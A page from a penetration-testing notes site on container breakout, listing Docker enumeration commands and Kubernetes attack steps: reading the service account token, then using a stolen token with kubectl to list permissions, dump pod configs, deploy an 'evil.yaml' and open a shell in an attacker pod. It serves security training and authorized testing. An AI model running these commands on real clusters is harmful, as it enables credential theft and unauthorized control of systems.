TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • Docker
  • Kubernetes
  • Get pods & configs
  • Build & Deploy
  • Execute command
  • Basic commands

Was this helpful?

  1. Post Exploitation

Container/Sandbox Breakout

Virtual inceptions

Docker

I first check the hosts for any potential cues of containerization and/or any other nodes on the network. You can also try running the binary capsh. If it exists, this can be used to print current container capabilities.

cat /etc/hosts #check for container id leik 8u9ru98432
capsh --print #check current unix capabilites

ls -l /proc/*/ns #list proc

ls -al /dev/ | grep disk #check for disks

Kubernetes

Try getting secrets.

cat /var/run/secrets/kubernetes.io/serviceaccount/token

List what you can do with this token

kubectl --token "$(cat token.txt)" --insecure-skip-tls-verify --server=https://team.thm:6443 auth can-i --list

Get pods & configs

kubectl get pods -o yaml > backup.config \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true 
kubectl get pods \
	--server="https://kube-serv:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true

Build & Deploy

kubectl  apply -f ./evil.yaml \
	--server="https://kube-server:6443" \
	--token='<token you steal>' \
	--insecure-skip-tls-verify=true

Execute command 

kubectl exec -it attacker \
	--server="https://kube-server:6443" \
	--token='<Token you steal>' \
	--insecure-skip-tls-verify=true \
	-- bash

Basic commands

kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints

#kubectl create deployment <deployment-name> --image=<docker image>
kubectl create deployment nginx-deployment --image=nginx
#Access the configuration of the deployment and modify it
#kubectl edit deployment <deployment-name>
kubectl edit deployment nginx-deployment
#Get the logs of the pod for debbugging (the output of the docker container running)
#kubectl logs <replicaset-id/pod-id>
kubectl logs nginx-deployment-84cd76b964
#kubectl describe pod <pod-id>
kubectl describe pod mongo-depl-5fd6b7d4b4-kkt9q
#kubectl exec -it <pod-id> -- bash
kubectl exec -it mongo-depl-5fd6b7d4b4-kkt9q -- bash
#kubectl describe service <service-name>
kubectl describe service mongodb-service
#kubectl delete deployment <deployment-name>
kubectl delete deployment mongo-depl
#Deploy from config file
kubectl apply -f deployment.yml

https://github.com/TurboWindX/kube-hunter

https://github.com/TurboWindX/peirates

PreviousPost ExploitationNextPrivilege Escalation

Last updated 3 years ago

Was this helpful?